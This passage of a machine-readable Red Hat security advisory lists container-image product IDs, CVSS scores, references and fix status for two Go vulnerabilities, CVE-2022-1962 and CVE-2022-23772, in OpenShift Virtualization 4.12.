"8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1962", }, { category: "external", summary: "RHBZ#2107376", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107376", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1962", url: "https://www.cve.org/CVERecord?id=CVE-2022-1962", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1962", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1962", }, { category: "external", summary: "https://go.dev/issue/53616", url: "https://go.dev/issue/53616", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 5.5, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: go/parser: stack exhaustion in all Parse* functions", }, { cve: "CVE-2022-23772", cwe: { id: "CWE-190", name: "Integer Overflow or Wraparound", }, discovery_date: "2022-02-11T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2053532", }, ], notes: [ { category: "description", text: "A flaw was found in the big package of the math library in golang. The Rat.SetString could cause an overflow, and if left unhandled, it could lead to excessive memory use. This issue could allow a remote attacker to impact the availability of the system.", title: "Vulnerability description", }, { category: "summary", text: "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString", title: "Vulnerability summary", }, { category: "other", text: "Red Hat Enterprise Linux 8 and 9 are affected, because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having Moderate security impact, and the issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7, hence, marked as Out-of-Support-Scope. \n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle & Updates Policy: https://access.redhat.com/support/policy/updates/errata/.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-23772", }, { category: "external", summary: "RHBZ#2053532", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2053532", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-23772", url: "https://www.cve.org/CVERecord?id=CVE-2022-23772", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-23772", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", url: "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ", }, ], release_date: "2022-01-19T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", 